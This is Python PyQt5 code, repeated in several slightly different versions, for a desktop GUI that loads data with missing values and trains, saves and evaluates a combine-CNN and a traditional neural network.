QMessageBox.information(self, 'Message', 'PreProcess succeed!',\n QMessageBox.Yes, QMessageBox.Yes)\n\n return\n\n ############## training module #################\n def setModelParameters(self):\n if self.sender() is self.setModelParametersButton:\n # print(1)\n self.setModelParaW = setModelParametersDialog.setLossParameterDialog('combine-CNN模型参数设置', self, 'New')\n\n elif self.sender() is self.setModelParametersButtonT:\n self.setModelParaW = setModelParametersDialog.setLossParameterDialog('traditional NN模型参数设置', self, 'Tra')\n\n def training(self):\n if self.sender() is self.trainingButton:\n if self.trainingW is not None:\n self.trainingW.hide()\n # print(self.trainingW)\n self.trainingW.show()\n return\n senderName = 'New'\n\n elif self.sender() is self.trainingButtonT:\n if self.trainingWT is not None:\n self.trainingWT.hide()\n self.trainingWT.show()\n\n senderName = 'Tra'\n\n if self.dataFor[senderName] is None:\n reply = QMessageBox.information(self, '数据错误', '没有加载数据,无法训练',\n QMessageBox.Yes, QMessageBox.Yes)\n return\n\n elif senderName == 'New':\n if 
self.dataFor[senderName].DataTrainX.shape[1] < self.combineNumConv:\n reply = QMessageBox.information(self, '参数错误', '卷积层组合(卷积核)大小大于数据集特征数量',\n QMessageBox.Yes, QMessageBox.Yes)\n return\n\n if combineNumCalculate.combineNumCal(self.dataFor[senderName].DataTrainX.shape[1], self.combineNumConv)\\\n < self.combineNumPooling:\n reply = QMessageBox.information(self, '参数错误', '池化层组合(池化核)大小大于卷积层输出特征向量维度',\n QMessageBox.Yes, QMessageBox.Yes)\n return\n\n # print(self.trainingW)\n if self.trainingWT is not None:\n reply = QMessageBox.information(self, '提示', 'traditional NN训练正在进行,请等待其结束',\n QMessageBox.Yes, QMessageBox.Yes)\n return\n\n self.trainingW = TrainingWidget.trainningWidget('combine-CNN训练', self, senderName)\n self.traingWidgetOnFlag[senderName] = False\n\n elif senderName == 'Tra':\n if self.trainingW is not None:\n reply = QMessageBox.information(self, '提示', 'combine-CNN训练正在进行,请等待其结束',\n QMessageBox.Yes, QMessageBox.Yes)\n return\n\n self.trainingWT = TrainingWidget.trainningWidget('traditional NN训练', self, senderName)\n self.traingWidgetOnFlag[senderName] = False\n\n return\n\n def saveModel(self):\n if self.sender() is self.saveModelButton:\n if self.mcbcnn is None:\n reply = QMessageBox.information(self, '模型错误', '模型不存在',\n QMessageBox.Yes, QMessageBox.Yes)\n return\n else:\n fname, ok = QFileDialog.getSaveFileName(self, 'Save Model', '..\\\\myCombineCNN.cbcnn.json',\n 'Combine-CNN json files (*.cbcnn.json)')\n if ok:\n succeed = self.mcbcnn.saveModel(fname)\n if succeed:\n reply = QMessageBox.information(self, '保存结果', '模型保存成功',\n QMessageBox.Yes, QMessageBox.Yes)\n else:\n reply = QMessageBox.information(self, '保存结果', '模型保存失败',\n QMessageBox.Yes, QMessageBox.Yes)\n else:\n reply = QMessageBox.information(self, '保存结果', '模型保存失败',\n QMessageBox.Yes, QMessageBox.Yes)\n\n elif self.sender() is self.saveModelButtonT:\n if self.trann is None:\n reply = QMessageBox.information(self, '模型错误', '模型不存在',\n QMessageBox.Yes, QMessageBox.Yes)\n return\n else:\n fname, ok = QFileDialog.getSaveFileName(self, 'Save Model', '..\\\\traditionalNN.trann.json',\n 'Traditional NN json files (*.trann.json)')\n if ok:\n succeed = self.trann.saveModel(fname)\n if succeed:\n reply = QMessageBox.information(self, '保存结果', '模型保存成功',\n QMessageBox.Yes, QMessageBox.Yes)\n else:\n reply = QMessageBox.information(self, '保存结果', '模型保存失败',\n QMessageBox.Yes, QMessageBox.Yes)\n else:\n reply = QMessageBox.information(self, '保存结果', '模型保存失败',\n QMessageBox.Yes, QMessageBox.Yes)\n\n\n def loadModel(self):\n if self.sender() is self.loadModelButton:\n fname, ok = QFileDialog.getOpenFileName(self, 'Load Model', '..',\n 'Combine-CNN json files (*.cbcnn.json)')\n if ok:\n if self.mcbcnn is None:\n self.mcbcnn = myCombineCNN.myCombineCNN(None, self.combineNumConv, self.convCoreNum, self.combineNumPooling)\n\n succeed = self.mcbcnn.setModel(fname)\n if succeed:\n modelName = fname.split('/')[-1].split('.')[0]\n self.presentModelName.setText(modelName)\n\n reply = QMessageBox.information(self, '设置结果', '模型设置成功',\n QMessageBox.Yes, QMessageBox.Yes)\n\n else:\n reply = QMessageBox.information(self, '设置结果', '模型设置失败',\n QMessageBox.Yes, QMessageBox.Yes)\n else:\n reply = QMessageBox.information(self, '设置结果', '模型设置失败',\n QMessageBox.Yes, QMessageBox.Yes)\n\n elif self.sender() is self.loadModelButtonT:\n fname, ok = QFileDialog.getOpenFileName(self, 'Load Model', '..',\n 'Traditional NN json files (*.trann.json)')\n if ok:\n if self.trann is None:\n self.trann = traditionalNN.traditionalNN(None)\n\n succeed = self.trann.setModel(fname)\n if 
succeed:\n modelName = fname.split('/')[-1].split('.')[0]\n self.presentModelNameT.setText(modelName)\n\n reply = QMessageBox.information(self, '设置结果', '模型设置成功',\n QMessageBox.Yes, QMessageBox.Yes)\n\n else:\n reply = QMessageBox.information(self, '设置结果', '模型设置失败',\n QMessageBox.Yes, QMessageBox.Yes)\n else:\n reply = QMessageBox.information(self, '设置结果', '模型设置失败',\n QMessageBox.Yes, QMessageBox.Yes)\n\n return\n\n def showResult(self):\n\n if self.sender() is self.showResultButton:\n if self.traingWidgetOnFlag['New']:\n reply = QMessageBox.information(self, '提示', '训练正在进行',\n QMessageBox.Yes, QMessageBox.Yes)\n return\n\n self.showResultW = showResultWidget.ShowResultWidget('combine-CNN预测结果展示', self, 'New')\n\n elif self.sender() is self.showResultButtonT:\n if self.traingWidgetOnFlag['Tra']:\n reply = QMessageBox.information(self, '提示', '训练正在进行',\n QMessageBox.Yes, QMessageBox.Yes)\n return\n\n self.showResultW = showResultWidget.ShowResultWidget('traditional NN预测结果展示', self, 'Tra')\n\n return\n\n def showJudge(self):\n if self.sender() is self.judgeResultButton:\n\n if self.traingWidgetOnFlag['New']:\n reply = QMessageBox.information(self, '提示', '训练正在进行',\n QMessageBox.Yes, QMessageBox.Yes)\n return\n\n self.chooseJDWin = chooseJudgeDataSetWidget.chooseJudgeDataSetWidget('Choose Judgement-based-on Data Set',\n self, 'New')\n\n elif self.sender() is self.judgeResultButtonT:\n\n if self.traingWidgetOnFlag['Tra']:\n reply = QMessageBox.information(self, '提示', '训练正在进行',\n QMessageBox.Yes, QMessageBox.Yes)\n return\n\n self.chooseJDWin = chooseJudgeDataSetWidget.chooseJudgeDataSetWidget('Choose Judgement-based-on Data Set',\n self, 'Tra')\n # self.testw = showJudgeWidgets.judgeWidget('test', self, 'New', 'Train')\n # self.mcbcnn.runCNN('Test', self.dataFor['New'])\n # drawCM = Judgement.myJudge(self.mcbcnn.data.yClassDic, self.mcbcnn.getAccuratePredictResult().argmax(1), self.mcbcnn.data.DataTestY.argmax(1))\n # drawCM.plotConfuseMatrix()\n\n\n\n\nif __name__ == '__main__':\n app = QApplication(sys.argv)\n myMainWindow = MyMainWindow()\n sys.exit(app.exec_())", "import sys\nfrom PyQt5.QtWidgets import QMainWindow, QWidget, QHBoxLayout, QVBoxLayout, QFrame, QSplitter, QStyleFactory, QApplication, QPushButton, QTextEdit, QLabel, QFileDialog, QMessageBox\nfrom PyQt5.QtCore import Qt\nfrom PyQt5.QtGui import QFont, QColor\nimport myLoadData\nfrom UIPack import setLossParameterDialog, showDataWidget, setModelParametersDialog, TrainingWidget, showResultWidget, showJudgeWidgets, chooseJudgeDataSetWidget\nfrom MyCombCNNPack import combineNumCalculate, myCombineCNN, traditionalNN, Judgement\n\n\nclass MyMainWindow(QMainWindow):\n\n def __init__(self):\n super().__init__()\n self.windowLength = 1250\n self.windowHigh = 900\n self.fname = dict()\n self.fname['New'] = None\n self.fname['Tra'] = None\n self.dataLossRate = dict()\n self.dataSetLossValue = dict()\n self.dataFor = dict()\n self.dataFor['New'] = None\n self.dataLossRate['New'] = 0.0\n self.dataSetLossValue['New'] = 0.0\n self.dataFor['Tra'] = None\n self.dataLossRate['Tra'] = 0.0\n self.dataSetLossValue['Tra'] = 0.0\n self.traingWidgetOnFlag = dict()\n self.traingWidgetOnFlag['New'] = False\n self.traingWidgetOnFlag['Tra'] = False\n self.combineNumConv = 2\n self.convCoreNum = 5\n self.combineNumPooling = 4\n self.fullConnectOutInRate = 0.5\n self.mcbcnn = None\n self.trann = None\n self.trainingW = None\n self.trainingWT = None\n self.initUI()\n self.initConnect()\n\n def initUI(self):\n self.statusBar().showMessage('Ready')\n dataModule = 
QVBoxLayout()\n self.dataFileChooseButton = QPushButton('选择数据')\n self.dataFileChooseButton.setFont(QFont('微软雅黑', 16))\n self.dataLossSimulateSettingButton = QPushButton('设置数据缺失参数')\n self.dataLossSimulateSettingButton.setFont(QFont('微软雅黑', 16))\n self.dataShowButton = QPushButton('展示数据')\n self.dataShowButton.setFont(QFont('微软雅黑', 16))\n label = QLabel('Present Data:')\n label.setFont(QFont('微软雅黑', 16))\n self.presentDataName = QLabel('None')\n self.presentDataName.setFont(QFont('微软雅黑', 16))\n labelbox = QVBoxLayout()\n labelbox.addWidget(label)\n labelbox.addWidget(self.presentDataName)\n dataModule.addStretch(1)\n dataModule.addLayout(labelbox)\n dataModule.addStretch(1)\n dataModule.addWidget(self.dataFileChooseButton)\n dataModule.addStretch(1)\n dataModule.addWidget(self.dataLossSimulateSettingButton)\n dataModule.addStretch(1)\n dataModule.addWidget(self.dataShowButton)\n dataModule.addStretch(1)\n trainingModule = QVBoxLayout()\n self.setModelParametersButton = QPushButton('Model Parameters')\n self.setModelParametersButton.setFont(QFont('微软雅黑', 16))\n self.trainingButton = QPushButton('Training')\n self.trainingButton.setFont(QFont('微软雅黑', 16))\n self.saveModelButton = QPushButton('Save Model')\n self.saveModelButton.setFont(QFont('微软雅黑', 16))\n self.loadModelButton = QPushButton('Load Model')\n self.loadModelButton.setFont(QFont('微软雅黑', 16))\n label = QLabel('Present Model:')\n label.setFont(QFont('微软雅黑', 16))\n self.presentModelName = QLabel('None')\n self.presentModelName.setFont(QFont('微软雅黑', 16))\n labelbox = QVBoxLayout()\n labelbox.addWidget(label)\n labelbox.addWidget(self.presentModelName)\n trainingModule.addStretch(1)\n trainingModule.addLayout(labelbox)\n trainingModule.addStretch(1)\n trainingModule.addWidget(self.setModelParametersButton)\n trainingModule.addStretch(1)\n trainingModule.addWidget(self.trainingButton)\n trainingModule.addStretch(1)\n trainingModule.addWidget(self.saveModelButton)\n trainingModule.addStretch(1)\n trainingModule.addWidget(self.loadModelButton)\n trainingModule.addStretch(1)\n resultShowModule = QVBoxLayout()\n self.showResultButton = QPushButton('分类结果展示')\n self.showResultButton.setFont(QFont('微软雅黑', 16))\n self.judgeResultButton = QPushButton('分类结果评估')\n self.judgeResultButton.setFont(QFont('微软雅黑', 16))\n resultShowModule.addWidget(self.showResultButton)\n resultShowModule.addWidget(self.judgeResultButton)\n hboxTop = QHBoxLayout()\n hboxTop.addStretch(1)\n mcnnLabel = QLabel('Combine-CNN:')\n mcnnLabel.setFont(QFont('微软雅黑', 24, QFont.Bold))\n hboxTop.addWidget(mcnnLabel)\n hboxTop.addStretch(1)\n hboxTop.addLayout(dataModule)\n hboxTop.addStretch(1)\n hboxTop.addLayout(trainingModule)\n hboxTop.addStretch(1)\n hboxTop.addLayout(resultShowModule)\n hboxTop.addStretch(1)\n dataModuleT = QVBoxLayout()\n self.dataFileChooseButtonT = QPushButton('选择数据')\n self.dataFileChooseButtonT.setFont(QFont('微软雅黑', 16))\n self.dataLossSimulateSettingButtonT = QPushButton('设置数据缺失参数')\n self.dataLossSimulateSettingButtonT.setFont(QFont('微软雅黑', 16))\n self.dataPreProcessButtonT = QPushButton('数据预处理')\n self.dataPreProcessButtonT.setFont(QFont('微软雅黑', 16))\n self.dataShowButtonT = QPushButton('展示数据')\n self.dataShowButtonT.setFont(QFont('微软雅黑', 16))\n label = QLabel('Present Data:')\n label.setFont(QFont('微软雅黑', 16))\n self.presentDataNameT = QLabel('None')\n self.presentDataNameT.setFont(QFont('微软雅黑', 16))\n labelbox = QVBoxLayout()\n labelbox.addWidget(label)\n labelbox.addWidget(self.presentDataNameT)\n dataModuleT.addStretch(1)\n 
dataModuleT.addLayout(labelbox)\n dataModuleT.addStretch(1)\n dataModuleT.addWidget(self.dataFileChooseButtonT)\n dataModuleT.addStretch(1)\n dataModuleT.addWidget(self.dataLossSimulateSettingButtonT)\n dataModuleT.addStretch(1)\n dataModuleT.addWidget(self.dataPreProcessButtonT)\n dataModuleT.addStretch(1)\n dataModuleT.addWidget(self.dataShowButtonT)\n dataModuleT.addStretch(1)\n trainingModuleT = QVBoxLayout()\n self.setModelParametersButtonT = QPushButton('Model Parameters')\n self.setModelParametersButtonT.setFont(QFont('微软雅黑', 16))\n self.trainingButtonT = QPushButton('Training')\n self.trainingButtonT.setFont(QFont('微软雅黑', 16))\n self.saveModelButtonT = QPushButton('Save Model')\n self.saveModelButtonT.setFont(QFont('微软雅黑', 16))\n self.loadModelButtonT = QPushButton('Load Model')\n self.loadModelButtonT.setFont(QFont('微软雅黑', 16))\n label = QLabel('Present Model:')\n label.setFont(QFont('微软雅黑', 16))\n self.presentModelNameT = QLabel('None')\n self.presentModelNameT.setFont(QFont('微软雅黑', 16))\n labelbox = QVBoxLayout()\n labelbox.addWidget(label)\n labelbox.addWidget(self.presentModelNameT)\n trainingModuleT.addStretch(1)\n trainingModuleT.addLayout(labelbox)\n trainingModuleT.addStretch(1)\n trainingModuleT.addWidget(self.setModelParametersButtonT)\n trainingModuleT.addStretch(1)\n trainingModuleT.addWidget(self.trainingButtonT)\n trainingModuleT.addStretch(1)\n trainingModuleT.addWidget(self.saveModelButtonT)\n trainingModuleT.addStretch(1)\n trainingModuleT.addWidget(self.loadModelButtonT)\n trainingModuleT.addStretch(1)\n resultShowModuleT = QVBoxLayout()\n self.showResultButtonT = QPushButton('分类结果展示')\n self.showResultButtonT.setFont(QFont('微软雅黑', 16))\n self.judgeResultButtonT = QPushButton('分类结果评估')\n self.judgeResultButtonT.setFont(QFont('微软雅黑', 16))\n resultShowModuleT.addWidget(self.showResultButtonT)\n resultShowModuleT.addWidget(self.judgeResultButtonT)\n hboxBottom = QHBoxLayout(self)\n hboxBottom.addStretch(1)\n traditionNNLabel = QLabel('Traditional NN:')\n traditionNNLabel.setFont(QFont('微软雅黑', 24, QFont.Bold))\n hboxBottom.addWidget(traditionNNLabel)\n hboxBottom.addStretch(1)\n hboxBottom.addLayout(dataModuleT)\n hboxBottom.addStretch(1)\n hboxBottom.addLayout(trainingModuleT)\n hboxBottom.addStretch(1)\n hboxBottom.addLayout(resultShowModuleT)\n hboxBottom.addStretch(1)\n splitterLine = QLabel(self)\n splitterLine.setFont(QFont('Times', 1))\n col = QColor(0, 0, 0)\n splitterLine.setStyleSheet('QWidget { background-color: %s }' % col\n .name())\n splitterLine.resize(splitterLine.sizeHint())\n vbox = QVBoxLayout()\n vbox.addLayout(hboxTop)\n vbox.addWidget(splitterLine)\n vbox.addLayout(hboxBottom)\n mainWidget = QWidget()\n mainWidget.setLayout(vbox)\n self.setCentralWidget(mainWidget)\n self.setGeometry(350, 100, self.windowLength, self.windowHigh)\n self.setWindowTitle('适用于有缺失值数据集的神经网络系统')\n self.show()\n\n def initConnect(self):\n self.dataFileChooseButton.clicked.connect(self.chooseData)\n self.dataFileChooseButtonT.clicked.connect(self.chooseData)\n self.dataLossSimulateSettingButton.clicked.connect(self.\n setLossParameter)\n self.dataLossSimulateSettingButtonT.clicked.connect(self.\n setLossParameter)\n self.dataShowButton.clicked.connect(self.showData)\n self.dataShowButtonT.clicked.connect(self.showData)\n self.dataPreProcessButtonT.clicked.connect(self.preProcess)\n self.setModelParametersButton.clicked.connect(self.setModelParameters)\n self.setModelParametersButtonT.clicked.connect(self.setModelParameters)\n 
self.trainingButton.clicked.connect(self.training)\n self.trainingButtonT.clicked.connect(self.training)\n self.saveModelButton.clicked.connect(self.saveModel)\n self.saveModelButtonT.clicked.connect(self.saveModel)\n self.loadModelButton.clicked.connect(self.loadModel)\n self.loadModelButtonT.clicked.connect(self.loadModel)\n self.showResultButton.clicked.connect(self.showResult)\n self.showResultButtonT.clicked.connect(self.showResult)\n self.judgeResultButton.clicked.connect(self.showJudge)\n self.judgeResultButtonT.clicked.connect(self.showJudge)\n\n def chooseData(self):\n if self.sender() is self.dataFileChooseButton:\n self.fname['New'], ok = QFileDialog.getOpenFileName(self,\n 'Open file', '..', 'Text files (*.txt)')\n if ok:\n self.loadData()\n elif self.sender() is self.dataFileChooseButtonT:\n self.fname['Tra'], ok = QFileDialog.getOpenFileName(self,\n 'Open file', '..', 'Text files (*.txt)')\n if ok:\n self.loadData()\n return\n\n def loadData(self):\n if self.sender() is self.dataFileChooseButton:\n try:\n self.dataFor['New'] = myLoadData.loadData(self.fname['New'],\n self.dataLossRate['New'], self.dataSetLossValue['New'])\n except FileNotFoundError as e:\n reply = QMessageBox.information(self, 'Message',\n 'Data file not exist', QMessageBox.Yes, QMessageBox.Yes)\n return\n except Exception:\n reply = QMessageBox.information(self, 'Message',\n 'Data file format error', QMessageBox.Yes, QMessageBox.Yes)\n return\n dataname = self.fname['New'].split('/')[-1].split('.')[0]\n self.presentDataName.setText(dataname)\n self.presentDataName.resize(self.presentDataName.sizeHint())\n elif self.sender() is self.dataFileChooseButtonT:\n try:\n self.dataFor['Tra'] = myLoadData.loadData(self.fname['Tra'],\n self.dataLossRate['Tra'], self.dataSetLossValue['Tra'])\n except FileNotFoundError as e:\n reply = QMessageBox.information(self, 'Message',\n 'Data file not exist', QMessageBox.Yes, QMessageBox.Yes)\n return\n except Exception:\n reply = QMessageBox.information(self, 'Message',\n 'Data file format error', QMessageBox.Yes, QMessageBox.Yes)\n return\n dataname = self.fname['Tra'].split('/')[-1].split('.')[0]\n self.presentDataNameT.setText(dataname)\n self.presentDataNameT.resize(self.presentDataNameT.sizeHint())\n return\n\n def setLossParameter(self):\n if self.sender() is self.dataLossSimulateSettingButton:\n self.setLPDialog = setLossParameterDialog.setLossParameterDialog(\n 'combine-CNN设置缺失参数', self, 'New')\n elif self.sender() is self.dataLossSimulateSettingButtonT:\n self.setLPDialog = setLossParameterDialog.setLossParameterDialog(\n 'traditional NN设置缺失参数', self, 'Tra')\n return\n\n def showData(self):\n if self.sender() is self.dataShowButton:\n self.showDataW = showDataWidget.ShowDataWidget('combine-CNN数据展示',\n self, 'New')\n elif self.sender() is self.dataShowButtonT:\n self.showDataW = showDataWidget.ShowDataWidget('traditional NN数据展示'\n , self, 'Tra')\n return\n\n def preProcess(self):\n if self.dataFor['Tra'] is None:\n reply = QMessageBox.information(self, '数据错误', '没有加载数据,无法预处理',\n QMessageBox.Yes, QMessageBox.Yes)\n else:\n self.dataFor['Tra'].MeanPreProcess()\n reply = QMessageBox.information(self, 'Message',\n 'PreProcess succeed!', QMessageBox.Yes, QMessageBox.Yes)\n return\n\n def setModelParameters(self):\n if self.sender() is self.setModelParametersButton:\n self.setModelParaW = (setModelParametersDialog.\n setLossParameterDialog('combine-CNN模型参数设置', self, 'New'))\n elif self.sender() is self.setModelParametersButtonT:\n self.setModelParaW = 
(setModelParametersDialog.\n setLossParameterDialog('traditional NN模型参数设置', self, 'Tra'))\n\n def training(self):\n if self.sender() is self.trainingButton:\n if self.trainingW is not None:\n self.trainingW.hide()\n self.trainingW.show()\n return\n senderName = 'New'\n elif self.sender() is self.trainingButtonT:\n if self.trainingWT is not None:\n self.trainingWT.hide()\n self.trainingWT.show()\n senderName = 'Tra'\n if self.dataFor[senderName] is None:\n reply = QMessageBox.information(self, '数据错误', '没有加载数据,无法训练',\n QMessageBox.Yes, QMessageBox.Yes)\n return\n elif senderName == 'New':\n if self.dataFor[senderName].DataTrainX.shape[1\n ] < self.combineNumConv:\n reply = QMessageBox.information(self, '参数错误',\n '卷积层组合(卷积核)大小大于数据集特征数量', QMessageBox.Yes, QMessageBox.Yes)\n return\n if combineNumCalculate.combineNumCal(self.dataFor[senderName].\n DataTrainX.shape[1], self.combineNumConv\n ) < self.combineNumPooling:\n reply = QMessageBox.information(self, '参数错误',\n '池化层组合(池化核)大小大于卷积层输出特征向量维度', QMessageBox.Yes,\n QMessageBox.Yes)\n return\n if self.trainingWT is not None:\n reply = QMessageBox.information(self, '提示',\n 'traditional NN训练正在进行,请等待其结束', QMessageBox.Yes,\n QMessageBox.Yes)\n return\n self.trainingW = TrainingWidget.trainningWidget('combine-CNN训练',\n self, senderName)\n self.traingWidgetOnFlag[senderName] = False\n elif senderName == 'Tra':\n if self.trainingW is not None:\n reply = QMessageBox.information(self, '提示',\n 'combine-CNN训练正在进行,请等待其结束', QMessageBox.Yes,\n QMessageBox.Yes)\n return\n self.trainingWT = TrainingWidget.trainningWidget('traditional NN训练'\n , self, senderName)\n self.traingWidgetOnFlag[senderName] = False\n return\n\n def saveModel(self):\n if self.sender() is self.saveModelButton:\n if self.mcbcnn is None:\n reply = QMessageBox.information(self, '模型错误', '模型不存在',\n QMessageBox.Yes, QMessageBox.Yes)\n return\n else:\n fname, ok = QFileDialog.getSaveFileName(self, 'Save Model',\n '..\\\\myCombineCNN.cbcnn.json',\n 'Combine-CNN json files (*.cbcnn.json)')\n if ok:\n succeed = self.mcbcnn.saveModel(fname)\n if succeed:\n reply = QMessageBox.information(self, '保存结果',\n '模型保存成功', QMessageBox.Yes, QMessageBox.Yes)\n else:\n reply = QMessageBox.information(self, '保存结果',\n '模型保存失败', QMessageBox.Yes, QMessageBox.Yes)\n else:\n reply = QMessageBox.information(self, '保存结果', '模型保存失败',\n QMessageBox.Yes, QMessageBox.Yes)\n elif self.sender() is self.saveModelButtonT:\n if self.trann is None:\n reply = QMessageBox.information(self, '模型错误', '模型不存在',\n QMessageBox.Yes, QMessageBox.Yes)\n return\n else:\n fname, ok = QFileDialog.getSaveFileName(self, 'Save Model',\n '..\\\\traditionalNN.trann.json',\n 'Traditional NN json files (*.trann.json)')\n if ok:\n succeed = self.trann.saveModel(fname)\n if succeed:\n reply = QMessageBox.information(self, '保存结果',\n '模型保存成功', QMessageBox.Yes, QMessageBox.Yes)\n else:\n reply = QMessageBox.information(self, '保存结果',\n '模型保存失败', QMessageBox.Yes, QMessageBox.Yes)\n else:\n reply = QMessageBox.information(self, '保存结果', '模型保存失败',\n QMessageBox.Yes, QMessageBox.Yes)\n\n def loadModel(self):\n if self.sender() is self.loadModelButton:\n fname, ok = QFileDialog.getOpenFileName(self, 'Load Model',\n '..', 'Combine-CNN json files (*.cbcnn.json)')\n if ok:\n if self.mcbcnn is None:\n self.mcbcnn = myCombineCNN.myCombineCNN(None, self.\n combineNumConv, self.convCoreNum, self.\n combineNumPooling)\n succeed = self.mcbcnn.setModel(fname)\n if succeed:\n modelName = fname.split('/')[-1].split('.')[0]\n self.presentModelName.setText(modelName)\n reply = 
QMessageBox.information(self, '设置结果', '模型设置成功',\n QMessageBox.Yes, QMessageBox.Yes)\n else:\n reply = QMessageBox.information(self, '设置结果', '模型设置失败',\n QMessageBox.Yes, QMessageBox.Yes)\n else:\n reply = QMessageBox.information(self, '设置结果', '模型设置失败',\n QMessageBox.Yes, QMessageBox.Yes)\n elif self.sender() is self.loadModelButtonT:\n fname, ok = QFileDialog.getOpenFileName(self, 'Load Model',\n '..', 'Traditional NN json files (*.trann.json)')\n if ok:\n if self.trann is None:\n self.trann = traditionalNN.traditionalNN(None)\n succeed = self.trann.setModel(fname)\n if succeed:\n modelName = fname.split('/')[-1].split('.')[0]\n self.presentModelNameT.setText(modelName)\n reply = QMessageBox.information(self, '设置结果', '模型设置成功',\n QMessageBox.Yes, QMessageBox.Yes)\n else:\n reply = QMessageBox.information(self, '设置结果', '模型设置失败',\n QMessageBox.Yes, QMessageBox.Yes)\n else:\n reply = QMessageBox.information(self, '设置结果', '模型设置失败',\n QMessageBox.Yes, QMessageBox.Yes)\n return\n\n def showResult(self):\n if self.sender() is self.showResultButton:\n if self.traingWidgetOnFlag['New']:\n reply = QMessageBox.information(self, '提示', '训练正在进行',\n QMessageBox.Yes, QMessageBox.Yes)\n return\n self.showResultW = showResultWidget.ShowResultWidget(\n 'combine-CNN预测结果展示', self, 'New')\n elif self.sender() is self.showResultButtonT:\n if self.traingWidgetOnFlag['Tra']:\n reply = QMessageBox.information(self, '提示', '训练正在进行',\n QMessageBox.Yes, QMessageBox.Yes)\n return\n self.showResultW = showResultWidget.ShowResultWidget(\n 'traditional NN预测结果展示', self, 'Tra')\n return\n\n def showJudge(self):\n if self.sender() is self.judgeResultButton:\n if self.traingWidgetOnFlag['New']:\n reply = QMessageBox.information(self, '提示', '训练正在进行',\n QMessageBox.Yes, QMessageBox.Yes)\n return\n self.chooseJDWin = (chooseJudgeDataSetWidget.\n chooseJudgeDataSetWidget(\n 'Choose Judgement-based-on Data Set', self, 'New'))\n elif self.sender() is self.judgeResultButtonT:\n if self.traingWidgetOnFlag['Tra']:\n reply = QMessageBox.information(self, '提示', '训练正在进行',\n QMessageBox.Yes, QMessageBox.Yes)\n return\n self.chooseJDWin = (chooseJudgeDataSetWidget.\n chooseJudgeDataSetWidget(\n 'Choose Judgement-based-on Data Set', self, 'Tra'))\n\n\nif __name__ == '__main__':\n app = QApplication(sys.argv)\n myMainWindow = MyMainWindow()\n sys.exit(app.exec_())\n", "<import token>\n\n\nclass MyMainWindow(QMainWindow):\n\n def __init__(self):\n super().__init__()\n self.windowLength = 1250\n self.windowHigh = 900\n self.fname = dict()\n self.fname['New'] = None\n self.fname['Tra'] = None\n self.dataLossRate = dict()\n self.dataSetLossValue = dict()\n self.dataFor = dict()\n self.dataFor['New'] = None\n self.dataLossRate['New'] = 0.0\n self.dataSetLossValue['New'] = 0.0\n self.dataFor['Tra'] = None\n self.dataLossRate['Tra'] = 0.0\n self.dataSetLossValue['Tra'] = 0.0\n self.traingWidgetOnFlag = dict()\n self.traingWidgetOnFlag['New'] = False\n self.traingWidgetOnFlag['Tra'] = False\n self.combineNumConv = 2\n self.convCoreNum = 5\n self.combineNumPooling = 4\n self.fullConnectOutInRate = 0.5\n self.mcbcnn = None\n self.trann = None\n self.trainingW = None\n self.trainingWT = None\n self.initUI()\n self.initConnect()\n\n def initUI(self):\n self.statusBar().showMessage('Ready')\n dataModule = QVBoxLayout()\n self.dataFileChooseButton = QPushButton('选择数据')\n self.dataFileChooseButton.setFont(QFont('微软雅黑', 16))\n self.dataLossSimulateSettingButton = QPushButton('设置数据缺失参数')\n self.dataLossSimulateSettingButton.setFont(QFont('微软雅黑', 16))\n 
self.dataShowButton = QPushButton('展示数据')\n self.dataShowButton.setFont(QFont('微软雅黑', 16))\n label = QLabel('Present Data:')\n label.setFont(QFont('微软雅黑', 16))\n self.presentDataName = QLabel('None')\n self.presentDataName.setFont(QFont('微软雅黑', 16))\n labelbox = QVBoxLayout()\n labelbox.addWidget(label)\n labelbox.addWidget(self.presentDataName)\n dataModule.addStretch(1)\n dataModule.addLayout(labelbox)\n dataModule.addStretch(1)\n dataModule.addWidget(self.dataFileChooseButton)\n dataModule.addStretch(1)\n dataModule.addWidget(self.dataLossSimulateSettingButton)\n dataModule.addStretch(1)\n dataModule.addWidget(self.dataShowButton)\n dataModule.addStretch(1)\n trainingModule = QVBoxLayout()\n self.setModelParametersButton = QPushButton('Model Parameters')\n self.setModelParametersButton.setFont(QFont('微软雅黑', 16))\n self.trainingButton = QPushButton('Training')\n self.trainingButton.setFont(QFont('微软雅黑', 16))\n self.saveModelButton = QPushButton('Save Model')\n self.saveModelButton.setFont(QFont('微软雅黑', 16))\n self.loadModelButton = QPushButton('Load Model')\n self.loadModelButton.setFont(QFont('微软雅黑', 16))\n label = QLabel('Present Model:')\n label.setFont(QFont('微软雅黑', 16))\n self.presentModelName = QLabel('None')\n self.presentModelName.setFont(QFont('微软雅黑', 16))\n labelbox = QVBoxLayout()\n labelbox.addWidget(label)\n labelbox.addWidget(self.presentModelName)\n trainingModule.addStretch(1)\n trainingModule.addLayout(labelbox)\n trainingModule.addStretch(1)\n trainingModule.addWidget(self.setModelParametersButton)\n trainingModule.addStretch(1)\n trainingModule.addWidget(self.trainingButton)\n trainingModule.addStretch(1)\n trainingModule.addWidget(self.saveModelButton)\n trainingModule.addStretch(1)\n trainingModule.addWidget(self.loadModelButton)\n trainingModule.addStretch(1)\n resultShowModule = QVBoxLayout()\n self.showResultButton = QPushButton('分类结果展示')\n self.showResultButton.setFont(QFont('微软雅黑', 16))\n self.judgeResultButton = QPushButton('分类结果评估')\n self.judgeResultButton.setFont(QFont('微软雅黑', 16))\n resultShowModule.addWidget(self.showResultButton)\n resultShowModule.addWidget(self.judgeResultButton)\n hboxTop = QHBoxLayout()\n hboxTop.addStretch(1)\n mcnnLabel = QLabel('Combine-CNN:')\n mcnnLabel.setFont(QFont('微软雅黑', 24, QFont.Bold))\n hboxTop.addWidget(mcnnLabel)\n hboxTop.addStretch(1)\n hboxTop.addLayout(dataModule)\n hboxTop.addStretch(1)\n hboxTop.addLayout(trainingModule)\n hboxTop.addStretch(1)\n hboxTop.addLayout(resultShowModule)\n hboxTop.addStretch(1)\n dataModuleT = QVBoxLayout()\n self.dataFileChooseButtonT = QPushButton('选择数据')\n self.dataFileChooseButtonT.setFont(QFont('微软雅黑', 16))\n self.dataLossSimulateSettingButtonT = QPushButton('设置数据缺失参数')\n self.dataLossSimulateSettingButtonT.setFont(QFont('微软雅黑', 16))\n self.dataPreProcessButtonT = QPushButton('数据预处理')\n self.dataPreProcessButtonT.setFont(QFont('微软雅黑', 16))\n self.dataShowButtonT = QPushButton('展示数据')\n self.dataShowButtonT.setFont(QFont('微软雅黑', 16))\n label = QLabel('Present Data:')\n label.setFont(QFont('微软雅黑', 16))\n self.presentDataNameT = QLabel('None')\n self.presentDataNameT.setFont(QFont('微软雅黑', 16))\n 